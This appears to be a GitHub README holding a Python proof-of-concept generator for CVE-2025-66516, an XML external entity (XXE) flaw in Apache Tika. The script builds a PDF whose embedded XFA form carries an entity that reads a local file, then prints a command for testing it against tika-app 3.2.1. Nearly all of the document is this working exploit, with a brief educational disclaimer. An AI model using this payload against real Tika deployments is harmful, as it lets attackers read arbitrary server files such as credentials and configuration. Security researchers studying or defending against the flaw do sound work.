README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-66516 POC Generator
Apache Tika XXE via XFA in PDF
DISCLAIMER: This POC code is for educational purposes only. Unauthorized use may violate laws.
"""
def build_file_read_xfa_xml(target_path):
# Normalize path separators to forward slashes for file:// URI
norm = target_path.replace("\\", "/")
# Build file:// URI with three slashes (file:/// for absolute paths)
file_uri = f"file:///{norm.lstrip('/')}"
# Return XFA XML structure with XXE payload embedded
return f"""<!DOCTYPE xfa [
<!ENTITY xxe SYSTEM "{file_uri}">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<xdp:template>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.8/">
<subform name="form1"><field name="field"/></subform>
</template>
</xdp:template>
<xdp:datasets>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data><root><field>&xxe;</field></root></xfa:data>
</xfa:datasets>
</xdp:datasets>
</xdp:xdp>
"""
def build_pdf(xfa_xml, out_path):
# List to accumulate PDF binary parts
parts = []
# PDF header with version 1.7 and binary marker bytes
parts.append(b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n")
# Track byte offsets of each PDF object for xref table
xref_positions = []
# Calculate current byte offset in PDF
def offset():
return sum(len(p) for p in parts)
# Add a PDF object with given number and body content
def add_obj(num, body):
# Record starting position of this object
xref_positions.append(offset())
# Object header: "n 0 obj"
parts.append(f"{num} 0 obj\n".encode("ascii"))
# Object body (dictionary, stream, etc.)
parts.append(body)
# Object footer
parts.append(b"\nendobj\n")
# To understand standard PDf structure and explanantion of each objects refer the link: https://pdfa.org/resource/pdf-specification-archive/
# Object 1: Document Catalog - root of PDF, references Pages and AcroForm
add_obj(1, b"<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>")
# Object 2: Pages tree with one page
add_obj(2, b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>")
# Object 3: Single page with letter size (612x792 points = 8.5x11 inches)
add_obj(3, b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << >> >>")
# Encode XFA XML to UTF-8 bytes
x_bytes = xfa_xml.encode("utf-8")
# Create stream object with length dictionary and stream data
x_stream = f"<< /Length {len(x_bytes)} >>\nstream\n".encode("ascii") + x_bytes + b"\nendstream"
# Object 5: XFA stream containing malicious XML
add_obj(5, x_stream)
# Object 4: AcroForm dictionary with /XFA reference pointing to object 5
add_obj(4, b"<< /NeedAppearances true /Fields [] /XFA 5 0 R >>")
# Record start position of cross-reference table
xref_start = offset()
# Begin xref table
parts.append(b"xref\n")
# Total number of objects (excluding object 0)
total = 5
# Xref subsection header: starts at 0, includes total+1 entries
parts.append(f"0 {total+1}\n".encode("ascii"))
# Entry 0: free object entry (always "0000000000 65535 f")
parts.append(b"0000000000 65535 f \n")
# Write xref entries for each object with 10-digit byte offset
for pos in xref_positions:
parts.append(f"{pos:010d} 00000 n \n".encode("ascii"))
# Trailer dictionary with document size and root reference, plus startxref pointer
parts.append(
f"trailer\n<< /Size {total+1} /Root 1 0 R >>\nstartxref\n{xref_start}\n%%EOF\n".encode("ascii")
)
with open(out_path, "wb") as f:
f.write(b"".join(parts))
if __name__ == "__main__":
target_file = "/home/siddhartha/apache_tika_poc/fake-secrets.txt"
xfa_xml = build_file_read_xfa_xml(target_file)
build_pdf(xfa_xml, "cve_2025_66516_poc.pdf")
print(f"[+] Generated cve_2025_66516_poc.pdf")
print(f"[+] Target: {target_file}")
print(f"[+] Test: java -jar tika-app-3.2.1.jar -t cve_2025_66516_poc.pdf")